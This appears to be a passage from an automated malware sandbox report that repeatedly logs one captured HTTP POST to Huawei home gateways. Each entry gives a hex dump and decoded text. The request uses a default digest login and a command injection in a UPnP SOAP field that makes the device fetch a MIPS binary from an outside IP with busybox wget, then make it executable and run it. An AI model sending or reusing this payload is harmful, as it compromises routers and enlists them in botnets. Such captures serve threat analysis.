70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo 